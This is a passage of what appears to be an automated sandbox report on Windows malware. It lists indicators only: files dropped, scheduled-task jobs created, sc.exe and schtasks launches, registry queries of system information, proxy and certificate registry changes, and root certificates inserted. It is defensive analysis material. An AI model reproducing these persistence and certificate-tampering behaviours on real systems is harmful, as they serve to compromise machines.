| File created | C:\Program Files (x86)\360\Total Security\Utils\cef\cefutil.exe | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\config\newui\themes\default\360searchlite_theme.xml | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\360ShellPro.exe | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\safemon\chromesafe64.dll | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\de\safemon\wdk.ini | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\ja\ipc\360netd.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\vi\safemon\drvmon.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\ipc\signbwl.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\zh-CN\safemon\Safemon.dll.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\vi\ipc\Sxin.dll.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\zh-TW\safemon\CameraProtect\CameraGuard\bkg\pic_01.jpg | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\en\ipc\filemon.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\softmgr\somkernl.dll | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\safemon\UDiskScanEngine.dll | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\safemon\chrmsafe.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\de\ipc\regmon.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\pl\ipc\NetDefender.dll.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\modules\360PatchMgr.exe | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\deepscan\heavygate.dll | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\deepscan\BAPIDRV_old.sys | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\360\Total Security\softmgr\AdvUtils.ini | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\deepscan\MiniRame.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\it\Dumpuper.exe.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\ipc\360AntiHacker.dll | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\pt\libvi.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\it\safemon\360procmon.dll.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\config\tools\nodes\RansomwareDecryptor.xml | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\vi\ipc\filemon.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\pt\ipc\Sxin.dll.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\fr\safemon\udisk.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\deepscan\AVE\360ave_ex.def | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\safemon\SafeWrapper32.dll | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\en\ipc\360netd.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\ru\libvi.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\fr\ipc\appd.dll.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\pt\deepscan\DsRes.dll | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\config\tools\nodes\BusinessVersion.xml | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\it\ipc\appd.dll.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\360DeskAna.exe | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\safemon\360calaInt.dll | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\deepscan\DsArk64_win10.sys | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\vi\ipc\regmon.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\de\safemon\SelfProtectAPI2.dll.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\config\lang\vi\SysSweeper.ui.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\de\safemon\chrome\360webshield.exe.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\fr\Dumpuper.exe.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\360NetBase.dll | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\Utils\AntiTrack.dll | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\fr\safemon\bp.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\pl\ipc\filemon.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\es\ipc\Sxin64.dll.locale | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\safemon\360Connect.tpi | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\safemon\spsafe.dll | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\pt\ipc\360netr.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| File created | C:\Program Files (x86)\360\Total Security\i18n\zh-CN\libaw.dat | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\axplont.job | C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Win32.Evo-gen.17039.18083.exe | N/A |
| File created | C:\Windows\Tasks\bqGGCwwWIommTRgeuN.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
| File created | C:\Windows\wusa.lock | C:\Windows\system32\wusa.exe | N/A |
| File created | C:\Windows\Tasks\WKALCIrwIEiqhKBsn.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\jiLwFdOzPPQiWLm.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\QdCYtDviHOrgqJLgZ.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\336473\Rent.pif | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS2BF.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS2BF.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-37-05-af-96-7d\WpadDecision = "0" | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\frDbhUXJJbPEeVC\asVPZnM.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-37-05-af-96-7d | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0061000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-37-05-af-96-7d\WpadDecisionTime = 402438a4adb2da01 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0B5DEEC5-0FD5-4419-86C2-4339D59D2C08}\0e-37-05-af-96-7d | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-37-05-af-96-7d\WpadDecision = "0" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\wscript.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings | C:\Windows\SysWOW64\wscript.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0B5DEEC5-0FD5-4419-86C2-4339D59D2C08}\WpadDecision = "0" | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-37-05-af-96-7d\WpadDecisionReason = "1" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0B5DEEC5-0FD5-4419-86C2-4339D59D2C08} | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-37-05-af-96-7d\WpadDetectedUrl | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000a06a8a8dadb2da01 | C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\frDbhUXJJbPEeVC\asVPZnM.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-37-05-af-96-7d\WpadDecisionTime = 402438a4adb2da01 | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\SysWOW64\wscript.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Cleanup | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Cleanup\Icon = "\"C:\\Program Files (x86)\\360\\Total Security\\QHSafeMain.exe\",0" | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Cleanup\command | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\Cleanup\command\ = "\"C:\\Program Files (x86)\\360\\Total Security\\QHSafeMain.exe\" /runclean" | C:\Program Files (x86)\1717086197_0\360TS_Setup.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe | N/A |
